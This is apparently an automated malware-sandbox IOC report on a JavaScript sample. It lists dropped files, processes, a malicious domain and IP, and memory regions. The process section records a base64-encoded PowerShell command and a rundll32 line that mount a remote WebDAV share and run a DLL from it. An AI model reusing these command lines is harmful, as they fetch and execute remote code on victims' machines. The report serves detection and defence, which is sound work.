IOC Report
1933725401135087429.js

loading gif

Files

File Path
Type
Category
Malicious
1933725401135087429.js
ASCII text, with very long lines (65536), with no line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hbgit5it.yr0.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r3zsr2ev.mv3.ps1
ASCII text, with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1933725401135087429.js"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADkAOQA4ADQAMQA3ADQAOAA3ADIAOAA2ADAANgAuAGQAbABsACwARQBuAHQAcgB5AA==
malicious
C:\Windows\System32\rundll32.exe
"C:\Windows\system32\rundll32.exe" \\apitestlabs.com@8888\davwwwroot\299841748728606.dll,Entry
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\net.exe
"C:\Windows\system32\net.exe" use \\apitestlabs.com@8888\davwwwroot\

URLs

Name
IP
Malicious
http://apitestlabs.com:8888/
unknown
http://apitestlabs.com:8888/V7
unknown
https://aka.ms/pscore68
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://apitestlabs.com:8888/%
unknown
http://apitestlabs.com:8888/em
unknown

Domains

Name
IP
Malicious
apitestlabs.com
94.159.113.48
malicious

IPs

IP
Domain
Country
Malicious
94.159.113.48
apitestlabs.com
Russian Federation
malicious

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
JScriptSetScriptStateStarted

Memdumps

Base Address
Regiontype
Protect
Malicious
20DA0E34000
heap
page read and write
1BD01A87000
heap
page read and write
7FFD344A0000
trusted library allocation
page read and write
1BD7ED20000
heap
page read and write
7FFD346A0000
trusted library allocation
page read and write
20DA0AFC000
heap
page read and write
1BD01A67000
heap
page read and write
246B1F7D000
trusted library allocation
page read and write
181FFFE000
stack
page read and write
1BD01A84000
heap
page read and write
20DA0B43000
heap
page read and write
7FFD346F0000
trusted library allocation
page read and write
1BD7F095000
heap
page read and write
1BD01A57000
heap
page read and write
1BD01A58000
heap
page read and write
1BD7F8B9000
heap
page read and write
F5DD6DA000
stack
page read and write
1BD7EDC0000
heap
page read and write
1BD01A88000
heap
page read and write
52AAD3E000
stack
page read and write
7FFD34550000
trusted library allocation
page execute and read and write
246A00C2000
heap
page read and write
2BCB95B4000
heap
page read and write
7FFD346D0000
trusted library allocation
page read and write
246A2394000
trusted library allocation
page read and write
2BCB935F000
heap
page read and write
246A013C000
heap
page read and write
52AA87F000
stack
page read and write
2BCB937B000
heap
page read and write
246A02F0000
heap
page read and write
246A1BC5000
heap
page read and write
246A0250000
trusted library allocation
page read and write
1BD7EE2F000
heap
page read and write
246BA176000
heap
page execute and read and write
7FFD3449D000
trusted library allocation
page execute and read and write
52AA9FD000
stack
page read and write
1BD7EE46000
heap
page read and write
7FFD34576000
trusted library allocation
page execute and read and write
1BD7F09D000
heap
page read and write
1BD7F09B000
heap
page read and write
246A1F2B000
trusted library allocation
page read and write
1BD7EDEB000
heap
page read and write
1BD0141E000
heap
page read and write
1BD01A51000
heap
page read and write
52AAFBE000
stack
page read and write
18205FE000
stack
page read and write
2BCB9440000
heap
page read and write
1BD01A67000
heap
page read and write
7FFD3454C000
trusted library allocation
page execute and read and write
1BD7EE46000
heap
page read and write
246A2026000
trusted library allocation
page read and write
BAD447C000
stack
page read and write
1BD7EE26000
heap
page read and write
18202FF000
stack
page read and write
246A00EE000
heap
page read and write
F5DD75E000
stack
page read and write
BAD41CE000
stack
page read and write
246BA2A0000
heap
page read and write
246A225E000
trusted library allocation
page read and write
246BA180000
heap
page read and write
7FFD34540000
trusted library allocation
page read and write
246A200F000
trusted library allocation
page read and write
1BD7FB34000
heap
page read and write
2BCB9348000
heap
page read and write
F5DDA7E000
stack
page read and write
246A02FE000
heap
page read and write
52AA97F000
stack
page read and write
246A0280000
heap
page read and write
1BD01A75000
heap
page read and write
246A23DE000
trusted library allocation
page read and write
246BA1A0000
heap
page read and write
1BD01A87000
heap
page read and write
1BD01A74000
heap
page read and write
20DA0B38000
heap
page read and write
246A22C7000
trusted library allocation
page read and write
1BD7EE46000
heap
page read and write
1BD01A87000
heap
page read and write
52AAAFE000
stack
page read and write
1BD01A91000
heap
page read and write
246A23B6000
trusted library allocation
page read and write
246BA0BB000
heap
page read and write
1BD01A67000
heap
page read and write
1BD01A87000
heap
page read and write
1BD01A98000
heap
page read and write
7FFD34660000
trusted library allocation
page execute and read and write
246A2009000
trusted library allocation
page read and write
246BA4A0000
heap
page read and write
1BD7F09B000
heap
page read and write
1BD7F090000
heap
page read and write
52AAC3E000
stack
page read and write
7FFD34730000
trusted library allocation
page read and write
BAD40CA000
stack
page read and write
246A2064000
trusted library allocation
page read and write
246A02F5000
heap
page read and write
1BD01A64000
heap
page read and write
1BD7EE30000
heap
page read and write
20DA0AD0000
heap
page read and write
246BA280000
heap
page read and write
20DA0AFC000
heap
page read and write
20DA0B0C000
heap
page read and write
1BD7F420000
heap
page read and write
20DA0B04000
heap
page read and write
1BD7EC40000
heap
page read and write
1BD01A75000
heap
page read and write
18206FE000
stack
page read and write
1BD01A70000
heap
page read and write
7FFD34494000
trusted library allocation
page read and write
52AAEBF000
stack
page read and write
1BD7EE2A000
heap
page read and write
52AA5F3000
stack
page read and write
2BCBC710000
heap
page read and write
1BD01A67000
heap
page read and write
7DF4271B0000
trusted library allocation
page execute and read and write
1BD01A87000
heap
page read and write
1BD01A7A000
heap
page read and write
7FFD34650000
trusted library allocation
page execute and read and write
246A2414000
trusted library allocation
page read and write
7FFD346B0000
trusted library allocation
page read and write
246A2017000
trusted library allocation
page read and write
246BA170000
heap
page execute and read and write
1BD01A60000
heap
page read and write
20DA0B07000
heap
page read and write
246A00F4000
heap
page read and write
2BCB95B0000
heap
page read and write
1BD01A55000
heap
page read and write
246BA05C000
heap
page read and write
246A244A000
trusted library allocation
page read and write
1BD7F09D000
heap
page read and write
1BD01A68000
heap
page read and write
7FFD34700000
trusted library allocation
page read and write
7FFD347A0000
trusted library allocation
page read and write
246A2020000
trusted library allocation
page read and write
20DA0B43000
heap
page read and write
F5DD7DE000
stack
page read and write
181FEF4000
stack
page read and write
246A1F99000
trusted library allocation
page read and write
20DA0B25000
heap
page read and write
7FFD34630000
trusted library allocation
page read and write
2BCB9540000
heap
page read and write
1BD01A8C000
heap
page read and write
1BD01B57000
heap
page read and write
52AACB6000
stack
page read and write
246A0230000
trusted library allocation
page read and write
1BD7EE2B000
heap
page read and write
246A010E000
heap
page read and write
246BA296000
heap
page read and write
20DA0AD8000
heap
page read and write
7FFD34710000
trusted library allocation
page read and write
1BD01A64000
heap
page read and write
1BD7ED40000
heap
page read and write
246A1F72000
trusted library allocation
page read and write
246BA293000
heap
page read and write
7FFD346E0000
trusted library allocation
page read and write
2BCB9355000
heap
page read and write
246BA2B0000
heap
page read and write
20DA0D30000
remote allocation
page read and write
2BCBC713000
heap
page read and write
1BD01A96000
heap
page read and write
1BD7EE23000
heap
page read and write
7FFD34690000
trusted library allocation
page read and write
246A0240000
heap
page readonly
2BCB934F000
heap
page read and write
246A2444000
trusted library allocation
page read and write
20DA0D30000
remote allocation
page read and write
20DA0B2D000
heap
page read and write
246A00B0000
heap
page read and write
7FFD3464A000
trusted library allocation
page read and write
1BD01A8B000
heap
page read and write
1BD01A86000
heap
page read and write
246BA130000
heap
page execute and read and write
7FFD34641000
trusted library allocation
page read and write
2BCBAEA0000
heap
page read and write
52AABF9000
stack
page read and write
BAD457F000
stack
page read and write
20DA0BE0000
heap
page read and write
1BD01A52000
heap
page read and write
18204FF000
stack
page read and write
1BD01A5C000
heap
page read and write
1BD01A9A000
heap
page read and write
1BD01A75000
heap
page read and write
1BD01A91000
heap
page read and write
1BD7EE46000
heap
page read and write
18203FF000
stack
page read and write
246A01D0000
heap
page read and write
1BD01A75000
heap
page read and write
2469FF90000
heap
page read and write
246A2012000
trusted library allocation
page read and write
1BD01A75000
heap
page read and write
2BCB934B000
heap
page read and write
20DA0B32000
heap
page read and write
1BD7EE46000
heap
page read and write
246A1F11000
trusted library allocation
page read and write
1BD0142C000
heap
page read and write
52AAE3E000
stack
page read and write
246BA2C5000
heap
page read and write
246A1BB0000
heap
page execute and read and write
246B1F11000
trusted library allocation
page read and write
20DA0B04000
heap
page read and write
2BCB9337000
heap
page read and write
52AAF3F000
stack
page read and write
7FFD34680000
trusted library allocation
page execute and read and write
2BCBCBD0000
trusted library allocation
page read and write
20DA0CC0000
heap
page read and write
20DA0E30000
heap
page read and write
246B1F1F000
trusted library allocation
page read and write
20DA0B2A000
heap
page read and write
2BCBC720000
heap
page read and write
1BD7F09D000
heap
page read and write
20DA0B31000
heap
page read and write
246A0136000
heap
page read and write
1BD7F779000
heap
page read and write
52AB03B000
stack
page read and write
52AA8FE000
stack
page read and write
246BA0DC000
heap
page read and write
7FFD34740000
trusted library allocation
page read and write
2BCB9520000
heap
page read and write
1BD01A7E000
heap
page read and write
246BA020000
heap
page read and write
52AAB7E000
stack
page read and write
20DA0B38000
heap
page read and write
7FFD34546000
trusted library allocation
page read and write
20DA0CE0000
heap
page read and write
7FFD34493000
trusted library allocation
page execute and read and write
18208FB000
stack
page read and write
1BD01A67000
heap
page read and write
7FFD347B0000
trusted library allocation
page read and write
1BD7EE3A000
heap
page read and write
246A1F33000
trusted library allocation
page read and write
246BA0D0000
heap
page read and write
1BD01A75000
heap
page read and write
246A00B8000
heap
page read and write
1BD7EE39000
heap
page read and write
20DA0B38000
heap
page read and write
20DA0B25000
heap
page read and write
7FFD34770000
trusted library allocation
page read and write
246A0210000
trusted library allocation
page read and write
246A00F0000
heap
page read and write
1BD01A9B000
heap
page read and write
246A00FA000
heap
page read and write
52AAA7F000
stack
page read and write
7FFD34780000
trusted library allocation
page read and write
246A1BC0000
heap
page read and write
BAD44FC000
stack
page read and write
1BD01A68000
heap
page read and write
1BD01A5C000
heap
page read and write
1BD01A75000
heap
page read and write
7FFD34720000
trusted library allocation
page read and write
1BD01A50000
heap
page read and write
246BA05E000
heap
page read and write
1BD01A7C000
heap
page read and write
2BCB95BB000
heap
page read and write
2BCB9365000
heap
page read and write
20DA0D30000
remote allocation
page read and write
7FFD34760000
trusted library allocation
page read and write
52AADBB000
stack
page read and write
246A0070000
heap
page read and write
1BD01A6C000
heap
page read and write
1BD01A74000
heap
page read and write
7FFD34790000
trusted library allocation
page read and write
1BD016A4000
heap
page read and write
7FFD34672000
trusted library allocation
page read and write
246BA106000
heap
page read and write
1BD01A67000
heap
page read and write
246BA094000
heap
page read and write
7FFD34750000
trusted library allocation
page read and write
1BD01A75000
heap
page read and write
1BD01A52000
heap
page read and write
1BD7EE72000
heap
page read and write
1BD01A91000
heap
page read and write
2BCB934B000
heap
page read and write
BAD414F000
stack
page read and write
52AAD38000
stack
page read and write
246A0090000
heap
page read and write
2BCB9330000
heap
page read and write
246A200C000
trusted library allocation
page read and write
7FFD34492000
trusted library allocation
page read and write
246A206B000
trusted library allocation
page read and write
1BD01A60000
heap
page read and write
246A0196000
heap
page read and write
18200FE000
stack
page read and write
20DA0B0C000
heap
page read and write
246A2023000
trusted library allocation
page read and write
7FFD346C0000
trusted library allocation
page read and write
246A0138000
heap
page read and write
20DA0B43000
heap
page read and write
7FFD345B0000
trusted library allocation
page execute and read and write
There are 276 hidden memdumps, click here to show them.